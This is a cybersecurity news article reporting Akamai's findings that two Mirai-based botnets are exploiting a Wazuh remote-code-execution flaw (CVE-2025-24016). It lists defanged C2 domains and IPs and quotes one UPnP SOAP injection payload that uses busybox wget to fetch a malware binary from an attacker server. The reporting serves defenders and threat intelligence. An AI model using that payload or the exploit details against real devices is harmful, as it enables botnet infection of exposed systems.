InfoSecBulletin Cybersecurity for mankind
The Security Intelligence and Response Team (SIRT) at Akamai has found that multiple Mirai-based botnets are exploiting CVE-2025-24016, a critical RCE vulnerability in Wazuh servers. This flaw, which has a CVSS score of 9.9, allows remote attackers to execute arbitrary Python code through unsanitized JSON inputs in the Wazuh Distributed API.
“This is the first reported active exploitation of this vulnerability since the initial disclosure in February 2025,” Akamai wrote in its report.
India’s Tata Electronics hit by cyber breach: Hacker target 630 GB record
Anthropic’s Mythos reportedly broke NSA classified systems in hours
OpenAI New Method “Deployment Simulation” Predicts AI Risks Before Deployment
AryStinger botnet infected thousands of D-Link routers globally
Hacker suspected of sending alerts across Brazil
CyberSentinel AI features 33 security tools like Nmap, SQLMap, and ZAP, utilizing Claude and GPT
Barracuda hosts Dhaka roundtable on cyber resilience
CISA Alerts Fortinet Users as FortiBleed Affects 86,644 FortiGate Devices
CISA: Splunk flaw under active exploit, patch by Sunday
Texas data breach exposes 3 million driver’s licenses
Disclosed in February 2025, CVE-2025-24016 affects Wazuh versions 4.4.0 to 4.9.0, allowing RCE via a malicious run_as request at the /security/user/authenticate/run_as endpoint.
The flaw in Wazuh is linked to the as_Wazuh_object() deserialization method in Python, which does not properly sanitize dictionary inputs.
“This can be exploited by injecting an unsanitized dictionary into DAPI requests, which can lead to evaluation of arbitrary Python code,” the report explains.
Akamai discovered two unique botnet campaigns exploiting this vulnerability, both based on Mirai malware.
The first wave appeared in early March 2025, shortly after public disclosure of the CVE, targeting IoT devices with a suite of architecture-specific binaries. The malware, dubbed “morte,” is part of the LZRD Mirai family, known for its console string “lzrd here”.
“The exploit fetches and executes a malicious shell script that serves as a downloader for the main Mirai malware payload,” the report explains.
Associated infrastructure includes:
C2 Domain: nuklearcnc.duckdns[.]org
Payload server: 176.65.134[.]62
Additional domains: cbot.galaxias[.]cc, neon.galaxias[.]cc, pangacnc[.]com
In May 2025, Akamai observed a second botnet dubbed “Resbot” exploiting the same vulnerability but using Italian-styled domain names like gestisciweb.com, suggesting targeting of Italian-speaking users.
The malware, “resgod”, prints the console string “Resentual got you!” upon execution and also targets multiple CPU architectures. Its C2 is hardcoded to 104.168.101[.]27 over TCP port 62627.
“It was using a variety of domains to spread the malware that all had Italian nomenclature… possibly alluding to the targeted geography or language spoken by the affected device owner,” the report notes.
In addition to CVE-2025-24016, the botnets were observed chaining exploits from past years, including:
CVE-2023-1389 (TP-Link)
CVE-2017-17215 (Huawei HG532)
CVE-2017-18368 (D-Link)
Exploits targeting Ivanti, UPnP, and YARN APIs
One attack string specifically crafted for UPnP exploitation via SOAP contained this payload:
<NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r /resgod.mips)</NewStatusURL>
These actions underscore a well-resourced and automated offensive campaign to compromise exposed and outdated infrastructure.
